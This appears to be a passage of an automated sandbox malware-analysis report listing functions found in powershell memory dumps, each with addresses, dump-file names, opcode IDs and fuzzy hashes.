                                                                                                            • Instruction Fuzzy Hash: C0225722B0EB891FE76A9B6858256B47BE2EF96310B0901FBD059C71E3DE15AD01C351
                                                                                                            Function 00007FFD9B7F88A6 Relevance: .3, Instructions: 334COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 060f7fb2fc6f2c87f092d8793a5e1d86273d21705905ea138858a5e6261d9e36
                                                                                                            • Instruction ID: 6d03d581a3eed23bd620c0295b5ba9a8d65803eb9914f4c413357f0d60a89e33
                                                                                                            • Opcode Fuzzy Hash: 060f7fb2fc6f2c87f092d8793a5e1d86273d21705905ea138858a5e6261d9e36
                                                                                                            • Instruction Fuzzy Hash: C9B1B67060DB8D8FDBA8DF28C8557E93BE1FF55310F04426AE84DC72A2CA749945CB82
                                                                                                            Function 00007FFD9B7F23D7 Relevance: .2, Instructions: 190COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6bd9b4796267f2b51d0431087754dd3d69357906a6a1a7dc913e5861c4bd67fe
                                                                                                            • Instruction ID: 25d1c89d853d3c8c8ea0154a94f97ae50627d7875b2f757b17fca98306f41f9c
                                                                                                            • Opcode Fuzzy Hash: 6bd9b4796267f2b51d0431087754dd3d69357906a6a1a7dc913e5861c4bd67fe
                                                                                                            • Instruction Fuzzy Hash: 0E512831A0EBC94FD71A97A858666F87FE0EF56310F0541BFE099C31E3C954681587C6
                                                                                                            Function 00007FFD9B6CE380 Relevance: .1, Instructions: 128COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1866879990.00007FFD9B6CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b6cd000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7379d44bad3a6506e7d8ce14200fd2b171c3a00a2271200700b83cfd70155435
                                                                                                            • Instruction ID: 0899bc5d2e2285bcab539c6d3b0fd1e35ccc9c4f36e0b91746c332dad7b6c3c3
                                                                                                            • Opcode Fuzzy Hash: 7379d44bad3a6506e7d8ce14200fd2b171c3a00a2271200700b83cfd70155435
                                                                                                            • Instruction Fuzzy Hash: 2E41187190EBC44FE766AB2898559623FB0EF52310B1602EFD0C8CF1A3D625B846C792
                                                                                                            Function 00007FFD9BAA1BB1 Relevance: .1, Instructions: 118COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1874612661.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3f87ce7df499774baff6d12eb9cd7397d51a1e733a6636f05c73a557630cbe75
                                                                                                            • Instruction ID: 5871c073863666fafd0b67fceedc7a33c98ccff7cc4aaa8241f6a63251c14d3e
                                                                                                            • Opcode Fuzzy Hash: 3f87ce7df499774baff6d12eb9cd7397d51a1e733a6636f05c73a557630cbe75
                                                                                                            • Instruction Fuzzy Hash: 52315522F1FA4E1BE7B8AB59507167872C3EFA6310B1A01BAD40DC71E2DD19ED01C295
                                                                                                            Function 00007FFD9B7F2D38 Relevance: .1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b80d3cee3ac216d4482da516f4e4d9068a6b4b86af512ea89e8495ebb355aaf2
                                                                                                            • Instruction ID: 200f1f7476a5130279c299bd6905f6727d0af8e395249fe126390e00a0fedf13
                                                                                                            • Opcode Fuzzy Hash: b80d3cee3ac216d4482da516f4e4d9068a6b4b86af512ea89e8495ebb355aaf2
                                                                                                            • Instruction Fuzzy Hash: 3B213E31A0CB4C4FDB58DF9C984A7E97FE0EB95321F04826FD048C3166DA74941ACB91
                                                                                                            Function 00007FFD9B7F83A4 Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 006ef89193f37db7056dde0c4c6d7ea25649f8312f9bd8e8adb420d901324e24
                                                                                                            • Instruction ID: d80e15346fd7b5e29d185e761070ae6d0af6f96559aaaf9b180edd5be9ab8b70
                                                                                                            • Opcode Fuzzy Hash: 006ef89193f37db7056dde0c4c6d7ea25649f8312f9bd8e8adb420d901324e24
                                                                                                            • Instruction Fuzzy Hash: 5E310D30E1968ECEFBB4DF54CD26BF936A0FF45319F410239D84D861B2CA386A45CA55
                                                                                                            Function 00007FFD9BAA1EDC Relevance: .1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1874612661.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9baa0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 84f874d60133837c5b0cf21c93561db143053ad6db47d13aa2d2505af03323d1
                                                                                                            • Instruction ID: 52377b73ae6a6f120e3db7f4243f28aaaa3969b5e23b2863afbf61c360ad843d
                                                                                                            • Opcode Fuzzy Hash: 84f874d60133837c5b0cf21c93561db143053ad6db47d13aa2d2505af03323d1
                                                                                                            • Instruction Fuzzy Hash: BC110232B0F68A5FE7B8D75890609B877D2EF26320B4600BAD45DC75B6DB58AD04C350
                                                                                                            Function 00007FFD9B7E5395 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2248704401172bfb9aa4a2e504e0105a49edda998868bac9ab0709ad1417766c
                                                                                                            • Instruction ID: f8e3dbd1ef924f143a45355f524a44bb5f18a37690d05a59cb4acaf4e90fc644
                                                                                                            • Opcode Fuzzy Hash: 2248704401172bfb9aa4a2e504e0105a49edda998868bac9ab0709ad1417766c
                                                                                                            • Instruction Fuzzy Hash: 0401A73020CB0C4FD748EF0CE051AA9B3E0FF85324F10056DE58AC36A5D632E881CB41
                                                                                                            Function 00007FFD9B7F2B80 Relevance: .0, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6b2dffc475ae27944faee7b5c4a00715016bc570bd6c12be4917e2fb7a1d7cfb
                                                                                                            • Instruction ID: 2d064d63f9954c5a93d5ae583a6977935d7a9fd932b762bf493b118bb67ad4df
                                                                                                            • Opcode Fuzzy Hash: 6b2dffc475ae27944faee7b5c4a00715016bc570bd6c12be4917e2fb7a1d7cfb
                                                                                                            • Instruction Fuzzy Hash: FAF0B43090868D8FDB069F7488195E57FA0EF26210B0502ABE85CC71B2DB24A554CB92

                                                                                                            Non-executed Functions

                                                                                                            Function 00007FFD9B7EEFD3 Relevance: 2.7, Strings: 2, Instructions: 248COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: TM_^$^
                                                                                                            • API String ID: 0-248116897
                                                                                                            • Opcode ID: 89a379adfd127d3fe0d0d69ffa11c6367b7d58694ae7c4b98b3a54d77daa6afd
                                                                                                            • Instruction ID: cf36470820c3c8aa9c88136447fdc334c755a553fde2dbb74c3c103aa4766974
                                                                                                            • Opcode Fuzzy Hash: 89a379adfd127d3fe0d0d69ffa11c6367b7d58694ae7c4b98b3a54d77daa6afd
                                                                                                            • Instruction Fuzzy Hash: FC61D61BB0956A46E705BAFCB9698FC3760DFC133AB26C3B7D1498D0E79D24208642D5
                                                                                                            Function 00007FFD9B7E84FD Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1867777957.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: M_^$M_^$M_^$M_^
                                                                                                            • API String ID: 0-1397233021
                                                                                                            • Opcode ID: 5e1ac53704f92782f0e6722ead1959166990ce1fb2c3482d95d95884a07e2e2d
                                                                                                            • Instruction ID: 7eacc5c5f1f5482cdf463843425d031be0a4f23624c21aa3bcaea871414e8c56
                                                                                                            • Opcode Fuzzy Hash: 5e1ac53704f92782f0e6722ead1959166990ce1fb2c3482d95d95884a07e2e2d
                                                                                                            • Instruction Fuzzy Hash: CB118775B0E6C68FD323876D98B84913BA0BF1221834B02F6D0988B0B3FE199A17C745